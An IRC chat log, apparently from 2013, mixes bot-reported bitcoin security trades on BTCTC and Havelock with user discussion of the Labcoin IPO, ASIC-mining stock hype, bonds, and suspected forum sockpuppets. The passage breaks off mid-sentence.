[ACTIVEMINING] 25 @ 0.005699 = 0.1425 BTC [-] Jul 31 13:50:06 [BTCTC] [ACTIVEMINING] 25 @ 0.005699 = 0.1425 BTC [-] Jul 31 13:50:18 [BTCTC] [ACTIVEMINING] 67 @ 0.0055 = 0.3685 BTC [-] Jul 31 13:50:25 [BTCTC] [ACTIVEMINING] 258 @ 0.0057 = 1.4706 BTC [+] Jul 31 13:50:29 20 btc on what Jul 31 13:50:58 all the knew shit i just found out about Jul 31 13:50:59 [BTCTC] [ACTIVEMINING] 25 @ 0.005699 = 0.1425 BTC [-] Jul 31 13:51:01 [BTCTC] [ACTIVEMINING] 42 @ 0.0057 = 0.2394 BTC [+] Jul 31 13:51:41 [BTCTC] [TAT.ASICMINER] 35 @ 0.0391 = 1.3685 BTC [+] Jul 31 13:51:56 [BTCTC] [ASICMINER-PT] 1 @ 4.082 BTC [-] Jul 31 13:51:58 [BTCTC] [ASICMINER-PT] 1 @ 4.08 BTC [-] Jul 31 13:52:01 [BTCTC] [ASICMINER-PT] 2 @ 4.08 = 8.16 BTC [-] Jul 31 13:52:06 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 31 13:52:10 [BTCTC] [ASICMINER-PT] 5 @ 4.05 = 20.25 BTC [-] Jul 31 13:52:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.0391 = 0.1173 BTC [+] Jul 31 13:52:31 new Jul 31 13:52:33 [BTCTC] [ACTIVEMINING] 1499 @ 0.0062 = 9.2938 BTC [+] Jul 31 13:54:03 20 btc on tat bonds? Jul 31 13:54:24 [BTCTC] [ACTIVEMINING] 70 @ 0.006397 = 0.4478 BTC [+] Jul 31 13:54:24 labcoin @8535 x_x Jul 31 13:54:27 [BTCTC] [ACTIVEMINING] 300 @ 0.00649 = 1.947 BTC [+] Jul 31 13:54:29 [BTCTC] [ACTIVEMINING] 146 @ 0.0065 = 0.949 BTC [+] Jul 31 13:54:31 [BTCTC] [ACTIVEMINING] 225 @ 0.00665 = 1.4963 BTC [+] Jul 31 13:54:32 [BTCTC] [ACTIVEMINING] 800 @ 0.0067 = 5.36 BTC [+] Jul 31 13:54:43 gone 21475 for labcoin here Jul 31 13:56:06 [BTCTC] [ACTIVEMINING] 25 @ 0.0068 = 0.17 BTC [+] Jul 31 13:56:08 [BTCTC] [ACTIVEMINING] 5 @ 0.0068 = 0.034 BTC [+] Jul 31 13:57:09 how labcoin handles this "incident" will be interesting.. holders of more than 1500 btc would be left behind already Jul 31 13:57:27 dexX7 what incident ? Jul 31 13:57:32 [BTCTC] [ACTIVEMINING] 10 @ 0.0068 = 0.068 BTC [+] Jul 31 13:58:58 [BTCTC] [CRYPTO-TRADE] 2 @ 0.195 = 0.39 BTC [-] Jul 31 13:59:27 [BTCTC] [ACTIVEMINING] 25 @ 0.0067 = 0.1675 BTC [-] Jul 31 13:59:33 well, incident is the wrong word i guess. the trading on labcoin hasn't started, but yet there is more demand than the original intended ipo Jul 31 14:01:10 they are victims of their own success Jul 31 14:01:11 their plan was to "announce a fixed date and time for the start", so it would be "fair" for everyone, but that went wrong Jul 31 14:01:36 reckon they'll release it in the next few hours and just let the market decide? Jul 31 14:02:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0391 BTC [+] Jul 31 14:03:13 [BTCTC] [CRYPTO-TRADE] 2 @ 0.195 = 0.39 BTC [-] Jul 31 14:03:21 i think the cleanest way would be to wipe the orderbook and lock placing bids for the time they intended prior the official trading start Jul 31 14:03:36 the ipo process itself is the problem Jul 31 14:03:40 why? Jul 31 14:03:46 ive pointed this out here and in the posts below https://bitcointalk.org/index.php?topic=263445.msg2837332#msg2837332 Jul 31 14:04:39 the price could be fixed, if everyone gets the percentage of the shares ordered versus total shares ordered Jul 31 14:04:55 there is an example 2 posts below Jul 31 14:05:27 good solution Jul 31 14:05:37 why not just sell into the bids, thats the 'normal' way Jul 31 14:05:38 this is how a wall street ipo works also Jul 31 14:05:51 dub: that would conflict with their initial announcement Jul 31 14:06:14 [BTCTC] [ASICMINER-PT] 5 @ 4.092 = 20.46 BTC [+] Jul 31 14:06:19 its a scam anyway who cares what is said Jul 31 14:06:37 What smidge says is right. IPOs should have one possibility: 1 price available only to prebid, IPO price. Jul 31 14:06:43 if the ipo price is a bid like it is currently, it adds another problem as you can see. nobody will be able to buy at the original ipo price Jul 31 14:06:50 yup Jul 31 14:07:16 i guess those are problems which weren't really predictable Jul 31 14:07:23 yes because the market is pricing it higher Jul 31 14:07:33 so if you distribute it via the percentage as i described, you have fair distribution, the price is the original ipo price, plus you can adjust # of shares Jul 31 14:07:53 you set a launch time, and after that let the market decide Jul 31 14:07:56 on the price Jul 31 14:08:00 yup Jul 31 14:08:12 it doesnt matter when Jul 31 14:08:16 exactly Jul 31 14:08:23 currently it does Jul 31 14:08:42 [BTCTC] [ACTIVEMINING] 1 @ 0.0064 BTC [-] Jul 31 14:09:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.0391 = 0.1564 BTC [+] Jul 31 14:09:34 [BTCTC] [ACTIVEMINING] 1899 @ 0.0064 = 12.1536 BTC [-] Jul 31 14:10:50 [BTCTC] [ACTIVEMINING] 25 @ 0.006103 = 0.1526 BTC [-] Jul 31 14:10:52 [BTCTC] [ACTIVEMINING] 50 @ 0.006102 = 0.3051 BTC [-] Jul 31 14:10:54 [BTCTC] [ACTIVEMINING] 50 @ 0.0061 = 0.305 BTC [-] Jul 31 14:10:56 [BTCTC] [ACTIVEMINING] 100 @ 0.006 = 0.6 BTC [-] Jul 31 14:10:56 what i also find depressing is people selling any other security in order to get into the hot stocks Jul 31 14:10:58 [BTCTC] [ACTIVEMINING] 1014 @ 0.005901 = 5.9836 BTC [-] Jul 31 14:11:00 [BTCTC] [ACTIVEMINING] 1 @ 0.0059 BTC [-] Jul 31 14:11:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.03999 = 0.16 BTC [+] Jul 31 14:11:35 [BTCTC] [ACTIVEMINING] 25 @ 0.006377 = 0.1594 BTC [+] Jul 31 14:11:37 [BTCTC] [ACTIVEMINING] 100 @ 0.006378 = 0.6378 BTC [+] Jul 31 14:11:43 but it's an opportunity to buy those stocks cheaper Jul 31 14:11:50 What I find depressing is random strangers on the Internet arrive with random ASIC offer on newly registered domains and are instantly worth 10'000-50'000 BTC without anything. Jul 31 14:12:09 ^ Jul 31 14:12:20 you got it Jul 31 14:12:21 It feels like good ol' dotcom Jul 31 14:12:30 wait wait, I can link to a website, its legit Jul 31 14:12:40 [BTCTC] [ACTIVEMINING] 388 @ 0.006299 = 2.444 BTC [-] Jul 31 14:12:42 Now it's ASIC mania Jul 31 14:12:46 xD Jul 31 14:12:47 true Jul 31 14:13:14 Oh I know... I'll start a security called AsicMania. AM for short. Jul 31 14:13:45 [BTCTC] [ACTIVEMINING] 25 @ 0.006201 = 0.155 BTC [-] Jul 31 14:13:47 [BTCTC] [ACTIVEMINING] 5 @ 0.0062 = 0.031 BTC [-] Jul 31 14:13:50 [BTCTC] [ACTIVEMINING] 25 @ 0.006289 = 0.1572 BTC [+] Jul 31 14:13:52 [BTCTC] [ACTIVEMINING] 200 @ 0.00629 = 1.258 BTC [+] Jul 31 14:13:53 [BTCTC] [ACTIVEMINING] 1000 @ 0.006297 = 6.297 BTC [+] Jul 31 14:13:55 [BTCTC] [ACTIVEMINING] 526 @ 0.006298 = 3.3127 BTC [+] Jul 31 14:13:56 [BTCTC] [ACTIVEMINING] 50 @ 0.0065 = 0.325 BTC [+] Jul 31 14:13:58 [BTCTC] [ACTIVEMINING] 67 @ 0.0066 = 0.4422 BTC [+] Jul 31 14:14:00 [BTCTC] [ACTIVEMINING] 30 @ 0.0066 = 0.198 BTC [+] Jul 31 14:14:01 [BTCTC] [ACTIVEMINING] 30 @ 0.0066 = 0.198 BTC [+] Jul 31 14:14:26 [BTCTC] [ACTIVEMINING] 303 @ 0.0066 = 1.9998 BTC [+] Jul 31 14:14:50 I'll only trust Chinese companies with no websites Jul 31 14:15:02 (because they're too busy actually doing stuff) Jul 31 14:15:25 i'd really like to see more business emerging around bitcoin.. not only finance and mining Jul 31 14:15:40 there's BitVPS Jul 31 14:15:44 yes, rock sol Jul 31 14:15:48 *solid, i'd say Jul 31 14:15:58 and pretty boring Jul 31 14:16:22 but it doesn't create the possibility of tons of speculative coins :) Jul 31 14:17:40 there are some attempts in real estate.. but it's hard to compete with finance and mining Jul 31 14:17:53 the worst comment i've read in the kelliworth thread was something like "bah, bitcoin doesn't need real life companies" Jul 31 14:17:54 can't see the point of real estate investing with bitcoins Jul 31 14:18:07 people aren't going to pay rent in bitcoins Jul 31 14:18:40 and I just wouldn't invest in real estate right now, unless I really knew the local market, which I don't Jul 31 14:18:44 not so sure, maybe we'll see such happen Jul 31 14:18:56 paying rent in bitcoins Jul 31 14:19:01 In total, around 6,377 GH/s, expected to be fully operational in the middle of August. Jul 31 14:19:06 I'm already in too deep, my home is likely to lose value Jul 31 14:19:06 thats two weeks Jul 31 14:19:16 [BTCTC] [TAT.VIRTUALMINE] 575 @ 0.002498 = 1.4364 BTC [-] Jul 31 14:19:19 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.002499 = 0.2499 BTC [+] Jul 31 14:19:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0025 BTC [+] Jul 31 14:19:34 it's an hedge against bitcoin price falling though Jul 31 14:19:53 haha - who? Jul 31 14:19:58 [BTCTC] [ACTIVEMINING] 12 @ 0.00658 = 0.079 BTC [-] Jul 31 14:20:01 AMC Jul 31 14:20:13 lol Jul 31 14:20:32 [BTCTC] [ASICMINER-PT] 1 @ 4.18 BTC [+] Jul 31 14:21:15 [HAVELOCK] [HIM] 1 @ 0.177 BTC [+] Jul 31 14:22:02 http://aaanditsgone.com Jul 31 14:23:05 [HAVELOCK] [SDSTM] 21 @ 0.00888 = 0.1865 BTC [+] Jul 31 14:23:08 [HAVELOCK] [SDSTM] 1 @ 0.00889 BTC [+] Jul 31 14:23:10 [HAVELOCK] [SDSTM] 27 @ 0.0089 = 0.2403 BTC [+] Jul 31 14:23:11 [HAVELOCK] [SDSTM] 19 @ 0.00891 = 0.1693 BTC [+] Jul 31 14:23:13 [HAVELOCK] [SDSTM] 8 @ 0.00891 = 0.0713 BTC [+] Jul 31 14:23:15 [HAVELOCK] [SDSTM] 5 @ 0.008998 = 0.045 BTC [+] Jul 31 14:23:18 [HAVELOCK] [SDSTM] 19 @ 0.00899847 = 0.171 BTC [+] Jul 31 14:24:04 [BTCTC] [TAT.MINIGAME] 100 @ 0.00028 = 0.028 BTC [-] Jul 31 14:25:19 [BTCTC] [BITVPS] 5 @ 0.001605 = 0.008 BTC [-] Jul 31 14:25:55 [BTCTC] [ACTIVEMINING] 25 @ 0.006001 = 0.15 BTC [-] Jul 31 14:25:56 what is the anticipated AM price? how many shares? i've got some bitcoin burning a hole in my knickers Jul 31 14:26:10 [BTCTC] [GSDPT] 5 @ 0.003356 = 0.0168 BTC [-] Jul 31 14:27:04 [BTCTC] [ACTIVEMINING] 25 @ 0.006001 = 0.15 BTC [-] Jul 31 14:27:06 [BTCTC] [ACTIVEMINING] 45 @ 0.006 = 0.27 BTC [-] Jul 31 14:27:28 [BTCTC] [DMS.MINING] 7 @ 0.007206 = 0.0504 BTC [+] Jul 31 14:28:01 [BTCTC] [TAT.ASICMINER] 6 @ 0.03999 = 0.2399 BTC [+] Jul 31 14:28:13 [BTCTC] [TAT.ASICMINER] 26 @ 0.039 = 1.014 BTC [-] Jul 31 14:28:45 [BTCTC] [ASICMINER-PT] 2 @ 4.085 = 8.17 BTC [-] Jul 31 14:30:37 give them to me Jul 31 14:32:54 dub... what? Jul 31 14:33:01 Who registered that domain? Jul 31 14:35:36 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.002399 = 0.036 BTC [-] Jul 31 14:38:15 do you like it? Jul 31 14:39:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005573 = 0.1393 BTC [-] Jul 31 14:39:56 [BTCTC] [ACTIVEMINING] 25 @ 0.005572 = 0.1393 BTC [-] Jul 31 14:40:03 I was kinda expecting the clip of "aaand it's gone", kinda like instantostrich Jul 31 14:40:10 But I guess Jul 31 14:41:20 [HAVELOCK] [SMG] 1 @ 0.0002697 BTC [+] Jul 31 14:41:50 [BTCTC] [TAT.ASICMINER] 200 @ 0.03715 = 7.43 BTC [-] Jul 31 14:42:05 [BTCTC] [TAT.ASICMINER] 94 @ 0.03712 = 3.4893 BTC [-] Jul 31 14:42:06 [BTCTC] [ACTIVEMINING] 25 @ 0.005573 = 0.1393 BTC [+] Jul 31 14:43:28 [BTCTC] [CRYPTO-TRADE] 2 @ 0.195 = 0.39 BTC [-] Jul 31 14:46:31 [BTCTC] [TAT.ASICMINER] 100 @ 0.03712 = 3.712 BTC [-] Jul 31 14:46:38 pwn pwn pwn. Jul 31 14:46:43 so much bitcoin sites are vulnerable. Jul 31 14:47:14 I thought it was a requirement Jul 31 14:47:37 Yeah. Jul 31 14:47:54 Unless you are Inputs.io or coinlenders. Jul 31 14:48:53 [BTCTC] [ASICMINER-PT] 1 @ 4.087 BTC [+] Jul 31 14:48:56 [BTCTC] [ASICMINER-PT] 1 @ 4.086 BTC [-] Jul 31 14:48:58 [BTCTC] [ASICMINER-PT] 1 @ 4.085 BTC [-] Jul 31 14:49:00 [BTCTC] [ASICMINER-PT] 3 @ 4.085 = 12.255 BTC [-] Jul 31 14:49:03 [BTCTC] [ASICMINER-PT] 4 @ 4.084 = 16.336 BTC [-] Jul 31 14:50:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0372 BTC [+] Jul 31 14:50:17 [MPEX] [S.MPOE] 7716 @ 0.0008028 = 6.1944 BTC [-] Jul 31 14:50:19 [BTCTC] [TAT.ASICMINER] 199 @ 0.03712 = 7.3869 BTC [-] Jul 31 14:52:12 [BTCTC] [ACTIVEMINING] 25 @ 0.005571 = 0.1393 BTC [-] Jul 31 14:52:14 [BTCTC] [ACTIVEMINING] 25 @ 0.00557 = 0.1393 BTC [-] Jul 31 14:52:16 [BTCTC] [ACTIVEMINING] 100 @ 0.0055 = 0.55 BTC [-] Jul 31 14:53:02 [BTCTC] [ACTIVEMINING] 25 @ 0.005581 = 0.1395 BTC [+] Jul 31 14:53:07 [BTCTC] [ACTIVEMINING] 3 @ 0.00558 = 0.0167 BTC [-] Jul 31 14:53:08 [BTCTC] [ACTIVEMINING] 72 @ 0.0055 = 0.396 BTC [-] Jul 31 14:53:42 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [+] Jul 31 14:53:45 [BTCTC] [ASICMINER-PT] 1 @ 4.084 BTC [-] Jul 31 14:54:06 [BTCTC] [ACTIVEMINING] 25 @ 0.005999 = 0.15 BTC [+] Jul 31 14:54:09 [BTCTC] [ACTIVEMINING] 5 @ 0.006 = 0.03 BTC [+] Jul 31 14:54:34 [BTCTC] [TAT.ASICMINER] 100 @ 0.03713 = 3.713 BTC [+] Jul 31 14:54:37 [BTCTC] [TAT.ASICMINER] 607 @ 0.03712 = 22.5318 BTC [-] Jul 31 14:54:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.03712 = 0.0742 BTC [-] Jul 31 14:54:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.03712 = 0.0742 BTC [-] Jul 31 14:55:09 [BTCTC] [COGNITIVE] 4 @ 0.4558 = 1.8232 BTC [-] Jul 31 14:55:09 [BTCTC] [ACTIVEMINING] 2 @ 0.005997 = 0.012 BTC [-] Jul 31 14:55:47 [BTCTC] [ACTIVEMINING] 25 @ 0.005997 = 0.1499 BTC [-] Jul 31 14:55:49 [BTCTC] [ACTIVEMINING] 25 @ 0.005998 = 0.15 BTC [+] Jul 31 14:56:14 [BTCTC] [BASIC-MINING] 1 @ 0.394 BTC [+] Jul 31 14:56:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.03711 = 0.2969 BTC [-] Jul 31 14:56:17 [BTCTC] [ACTIVEMINING] 25 @ 0.005997 = 0.1499 BTC [-] Jul 31 14:56:18 [BTCTC] [BASIC-MINING] 3 @ 0.3932 = 1.1796 BTC [-] Jul 31 14:56:20 [BTCTC] [ACTIVEMINING] 25 @ 0.005998 = 0.15 BTC [+] Jul 31 14:57:07 [BTCTC] [TAT.ASICMINER] 14 @ 0.0372 = 0.5208 BTC [+] Jul 31 14:57:44 [BTCTC] [ACTIVEMINING] 25 @ 0.006299 = 0.1575 BTC [+] Jul 31 14:57:54 [BTCTC] [ACTIVEMINING] 49 @ 0.0063 = 0.3087 BTC [+] Jul 31 14:58:26 [BTCTC] [DMS.MINING] 17 @ 0.007204 = 0.1225 BTC [-] Jul 31 14:58:36 [BTCTC] [ASICMINER-PT] 11 @ 4.4 = 48.4 BTC [+] Jul 31 14:59:58 [HAVELOCK] [KCIM] [PAID] 9.07000000 BTC to 907 shares, 1000000 satoshi per share Jul 31 15:00:14 [HAVELOCK] [HIM] [PAID] 52.00000000 BTC to 40`000 shares, 130000 satoshi per share Jul 31 15:00:15 dexX7 you know, these things seem fascinating new stuff for you because you haven't been following mpex. Jul 31 15:00:21 otherwise, ipos are ipos. Jul 31 15:00:56 [BTCTC] [ACTIVEMINING] 25 @ 0.006294 = 0.1574 BTC [-] Jul 31 15:00:59 [BTCTC] [ACTIVEMINING] 40 @ 0.006295 = 0.2518 BTC [+] Jul 31 15:02:14 http://coinstocks.net/ Jul 31 15:02:22 that makes life so much easier Jul 31 15:02:23 [BTCTC] [ASICMINER-PT] 1 @ 4.101 BTC [-] Jul 31 15:02:27 ... Jul 31 15:02:47 [BTCTC] [BASIC-MINING] 5 @ 0.3932 = 1.966 BTC [-] Jul 31 15:02:57 "This list should help you decide which bitcoin stocks to invest in. "Potential price" shows the price of the stock if it would have the same market cap as ASICMINER. "Potential gain" is the ratio between potential price and current price (or IPO price, if the stock is not traded yet)." Jul 31 15:03:20 ... Jul 31 15:03:22 [MPEX] [S.MPOE] 12650 @ 0.00080014 = 10.1218 BTC [-] Jul 31 15:03:28 why would something have the same mkt cap as asicminer ?! Jul 31 15:03:46 [BTCTC] [COGNITIVE] 2 @ 0.455 = 0.91 BTC [-] Jul 31 15:03:50 [BTCTC] [COGNITIVE] 1 @ 0.45 BTC [-] Jul 31 15:03:50 don't tell me, "because it's also an item" ?! Jul 31 15:03:52 [BTCTC] [COGNITIVE] 2 @ 0.45 = 0.9 BTC [-] Jul 31 15:03:53 they are basically smacking themselves in the face Jul 31 15:04:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [+] Jul 31 15:04:24 no one wants to miss the next AM Jul 31 15:04:25 need moar palms. Jul 31 15:04:33 and everything is the next AM Jul 31 15:04:34 [BTCTC] [BTC-TRADING-PT] 2 @ 0.7227 = 1.4454 BTC [-] Jul 31 15:04:36 "no one" = "no fucktard on reddit" Jul 31 15:04:41 :) Jul 31 15:04:54 too many AMs! Jul 31 15:05:02 who was going to make AMethyst ? Jul 31 15:05:09 VanCleef? Jul 31 15:05:12 a righty Jul 31 15:05:14 solution = buy them all. Jul 31 15:05:29 yeh babe? Jul 31 15:05:33 how's the gem Jul 31 15:06:16 [HAVELOCK] [SMG] 42 @ 0.0002697 = 0.0113 BTC [+] Jul 31 15:08:14 [BTCTC] [ASICMINER-PT] 1 @ 4.18 BTC [+] Jul 31 15:08:17 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [+] Jul 31 15:08:19 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [+] Jul 31 15:08:22 [BTCTC] [ASICMINER-PT] 1 @ 4.248 BTC [+] Jul 31 15:08:24 [BTCTC] [ASICMINER-PT] 9 @ 4.29 = 38.61 BTC [+] Jul 31 15:08:27 [BTCTC] [ASICMINER-PT] 25 @ 4.3 = 107.5 BTC [+] Jul 31 15:08:29 [BTCTC] [ASICMINER-PT] 3 @ 4.33 = 12.99 BTC [+] Jul 31 15:08:32 [BTCTC] [ASICMINER-PT] 1 @ 4.345 BTC [+] Jul 31 15:08:34 [BTCTC] [ASICMINER-PT] 2 @ 4.35 = 8.7 BTC [+] Jul 31 15:08:36 [BTCTC] [ASICMINER-PT] 10 @ 4.35 = 43.5 BTC [+] Jul 31 15:08:38 [BTCTC] [ASICMINER-PT] 1 @ 4.352 BTC [+] Jul 31 15:08:40 [BTCTC] [ASICMINER-PT] 1 @ 4.389 BTC [+] Jul 31 15:08:42 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [+] Jul 31 15:08:44 [BTCTC] [ASICMINER-PT] 1 @ 4.397 BTC [+] Jul 31 15:09:17 [BTCTC] [ACTIVEMINING] 25 @ 0.0062 = 0.155 BTC [-] Jul 31 15:10:48 [BTCTC] [ACTIVEMINING] 25 @ 0.006018 = 0.1505 BTC [-] Jul 31 15:10:50 [BTCTC] [ASICMINER-PT] 1 @ 4.112 BTC [-] Jul 31 15:10:50 [BTCTC] [ACTIVEMINING] 50 @ 0.006017 = 0.3009 BTC [-] Jul 31 15:10:56 [BTCTC] [ACTIVEMINING] 45 @ 0.006015 = 0.2707 BTC [-] Jul 31 15:11:21 ;;nethash Jul 31 15:11:22 293556.349103 Jul 31 15:11:26 ;;estimate Jul 31 15:11:27 Next difficulty estimate | 35983896.6787 based on data since last change | 41008722.4731 based on data for last three days Jul 31 15:12:22 taaaat Jul 31 15:13:13 [BTCTC] [ACTIVEMINING] 25 @ 0.006011 = 0.1503 BTC [-] Jul 31 15:13:30 [BTCTC] [COGNITIVE] 1 @ 0.45 BTC [-] Jul 31 15:13:32 [BTCTC] [COGNITIVE] 1 @ 0.45 BTC [-] Jul 31 15:13:55 [BTCTC] [ACTIVEMINING] 25 @ 0.006011 = 0.1503 BTC [-] Jul 31 15:13:57 [BTCTC] [ACTIVEMINING] 1 @ 0.00601 BTC [-] Jul 31 15:13:59 [BTCTC] [COGNITIVE] 1 @ 0.4301 BTC [-] Jul 31 15:14:19 [BTCTC] [ACTIVEMINING] 25 @ 0.006021 = 0.1505 BTC [+] Jul 31 15:14:31 [HAVELOCK] [AM100] 1 @ 0.0405 BTC [+] Jul 31 15:14:39 [BTCTC] [ACTIVEMINING] 25 @ 0.006022 = 0.1506 BTC [+] Jul 31 15:14:47 [BTCTC] [ACTIVEMINING] 25 @ 0.006021 = 0.1505 BTC [-] Jul 31 15:14:49 [BTCTC] [ACTIVEMINING] 9 @ 0.00602 = 0.0542 BTC [-] Jul 31 15:14:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006021 = 0.1505 BTC [+] Jul 31 15:14:54 [BTCTC] [ACTIVEMINING] 156 @ 0.00602 = 0.9391 BTC [-] Jul 31 15:15:12 sup Jul 31 15:15:26 [HAVELOCK] [AM100] 1 @ 0.0407 BTC [+] Jul 31 15:15:29 [BTCTC] [ACTIVEMINING] 33 @ 0.005997 = 0.1979 BTC [-] Jul 31 15:16:12 [BTCTC] [RSM] 189 @ 0.01357 = 2.5647 BTC [-] Jul 31 15:16:40 just laughing at btcgarden my bad 16 million valuation not 160 million Jul 31 15:16:42 [BTCTC] [RSM] 10 @ 0.01356 = 0.1356 BTC [-] Jul 31 15:16:48 lolz but still 16 million wtf Jul 31 15:17:01 [BTCTC] [ACTIVEMINING] 50 @ 0.0056 = 0.28 BTC [-] Jul 31 15:17:03 [BTCTC] [ACTIVEMINING] 121 @ 0.005573 = 0.6743 BTC [-] Jul 31 15:17:13 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 31 15:17:14 [BTCTC] [RSM] 91 @ 0.01352 = 1.2303 BTC [-] Jul 31 15:17:26 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 31 15:17:40 [BTCTC] [ASICMINER-PT] 6 @ 4.397 = 26.382 BTC [+] Jul 31 15:17:43 [BTCTC] [ASICMINER-PT] 1 @ 4.398 BTC [+] Jul 31 15:17:46 [BTCTC] [ASICMINER-PT] 2 @ 4.398 = 8.796 BTC [+] Jul 31 15:17:48 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 31 15:17:50 [BTCTC] [ASICMINER-PT] 5 @ 4.4 = 22 BTC [+] Jul 31 15:18:10 asicminer back with a slap Jul 31 15:18:45 kinda funny how right when I wanna drop XBOND, the forum is rabid about Pre-IPO bidding Jul 31 15:18:56 [BTCTC] [TAT.ASICMINER] 30 @ 0.0395 = 1.185 BTC [-] Jul 31 15:19:18 oh, i thought this was your reaction to this madness Jul 31 15:19:42 no it's been planned for more than a month Jul 31 15:20:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.03992 = 0.1198 BTC [+] Jul 31 15:20:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.03992 = 0.7984 BTC [+] Jul 31 15:20:52 tat just sneezes and puts together a better prospectus in 5 mins Jul 31 15:21:28 [BTCTC] [TAT.ASICMINER] 30 @ 0.03992 = 1.1976 BTC [+] Jul 31 15:21:42 bonds are boring, can't multiply money fast enough Jul 31 15:22:15 basically you can't even get stocks at the ipo price of 0.001 now Jul 31 15:22:21 [BTCTC] [TAT.ASICMINER] 53 @ 0.04 = 2.12 BTC [+] Jul 31 15:22:25 re: labcoin Jul 31 15:22:39 but labcoin is worth a million dollars today Jul 31 15:22:44 with no sales Jul 31 15:22:57 going up against asicminer Jul 31 15:23:24 I should IPO my mining company Jul 31 15:23:31 I just need to find a chinese guy Jul 31 15:23:34 to appear legit Jul 31 15:23:47 and name him frozenhippo Jul 31 15:23:52 lol Jul 31 15:24:37 [BTCTC] [ACTIVEMINING] 1 @ 0.005799 BTC [+] Jul 31 15:25:00 hmm 10:30pm, do i stay up all night hoping labcoin goes live tonight or not Jul 31 15:25:12 [08:21] bonds are boring, can't multiply money fast enough <<< reinvest your daily divs, probly make more than any of these garbage pump'n'dumps, with less wasted time staying savvy for the next forum herd migration Jul 31 15:25:20 [BTCTC] [ACTIVEMINING] 25 @ 0.005799 = 0.145 BTC [+] Jul 31 15:25:43 [BTCTC] [ACTIVEMINING] 85 @ 0.005799 = 0.4929 BTC [+] Jul 31 15:25:48 [BTCTC] [ACTIVEMINING] 1 @ 0.005584 BTC [-] Jul 31 15:25:50 [BTCTC] [ACTIVEMINING] 50 @ 0.005578 = 0.2789 BTC [-] Jul 31 15:25:52 [BTCTC] [ACTIVEMINING] 210 @ 0.005577 = 1.1712 BTC [-] Jul 31 15:25:55 [BTCTC] [ACTIVEMINING] 50 @ 0.005572 = 0.2786 BTC [-] Jul 31 15:25:57 [BTCTC] [ACTIVEMINING] 18 @ 0.00557 = 0.1003 BTC [-] Jul 31 15:25:59 [BTCTC] [ACTIVEMINING] 20 @ 0.00555 = 0.111 BTC [-] Jul 31 15:26:00 [BTCTC] [ACTIVEMINING] 1 @ 0.005504 BTC [-] Jul 31 15:26:04 [BTCTC] [ACTIVEMINING] 140 @ 0.0055 = 0.77 BTC [-] Jul 31 15:26:08 [BTCTC] [ACTIVEMINING] 3 @ 0.0055 = 0.0165 BTC [-] Jul 31 15:26:13 [BTCTC] [ACTIVEMINING] 422 @ 0.005428 = 2.2906 BTC [-] Jul 31 15:26:18 reinvesting something like 25% yearly div still isn't that much Jul 31 15:27:02 ThickAsThieves: eh, why not Jul 31 15:27:11 especially about wasted time Jul 31 15:27:27 what I have isn't worth enough to try to day or week-trade Jul 31 15:27:58 I should probably start a real bitcoin business with my time :) Jul 31 15:28:11 buy all the IPOs you can get your hands on and hold :p Jul 31 15:28:18 [08:26] reinvesting something like 25% yearly div still isn't that much <<< if you know what youre doing, no it isnt Jul 31 15:28:34 [BTCTC] [ACTIVEMINING] 25 @ 0.005429 = 0.1357 BTC [+] Jul 31 15:28:36 [BTCTC] [ACTIVEMINING] 178 @ 0.005428 = 0.9662 BTC [-] Jul 31 15:28:37 but if you factor how much time people waste refreshing forum threads Jul 31 15:28:40 [BTCTC] [ACTIVEMINING] 47 @ 0.005151 = 0.2421 BTC [-] Jul 31 15:28:45 and how much they actually lose over a year Jul 31 15:29:08 there's a whole tier of "investor" that would be better off with bonds Jul 31 15:29:27 if not less entertained... Jul 31 15:30:19 [BTCTC] [BASIC-MINING] 1 @ 0.3602 BTC [-] Jul 31 15:30:38 [BTCTC] [ACTIVEMINING] 225 @ 0.005201 = 1.1702 BTC [+] Jul 31 15:30:41 I wonder if bonds would be better - for me - than something like just-dice Jul 31 15:30:52 I like the possibility to get to the money really fast Jul 31 15:31:01 i think its depends on who's issuing the bond Jul 31 15:31:10 it can be quite the nice safe haven Jul 31 15:31:41 [BTCTC] [DMS.SELLING] 1 @ 0.023 BTC [+] Jul 31 15:31:44 [BTCTC] [DMS.SELLING] 9 @ 0.023 = 0.207 BTC [+] Jul 31 15:31:46 [BTCTC] [DMS.SELLING] 12 @ 0.023 = 0.276 BTC [+] Jul 31 15:31:47 [BTCTC] [DMS.SELLING] 58 @ 0.0235 = 1.363 BTC [+] Jul 31 15:31:56 AMC sock #Xb433D https://bitcointalk.org/index.php?action=profile;u=103858;sa=showPosts Jul 31 15:32:04 [BTCTC] [ACTIVEMINING] 846 @ 0.005201 = 4.4 BTC [+] Jul 31 15:32:38 ThickAsThieves i think you spotted one. Jul 31 15:32:43 I wonder if they're socks or just stupid Jul 31 15:32:52 ive marked at least 4 so far Jul 31 15:33:12 or socks of heavy investors maybe Jul 31 15:33:14 i think those guys are professionals man Jul 31 15:33:18 [BTCTC] [DMS.SELLING] 12 @ 0.0235 = 0.282 BTC [+] Jul 31 15:33:26 anyone else tried doing that the stock would have collapse Jul 31 15:33:27 pankkake definitely sock. Jul 31 15:33:57 and yes, i suspect VanCleef is right. we have a team of scammers working the "investor" angle on the forum. Jul 31 15:33:57 they must have a office in india or something full of 50 crypto trader trolls Jul 31 15:34:02 yup. Jul 31 15:34:12 wait ok, he 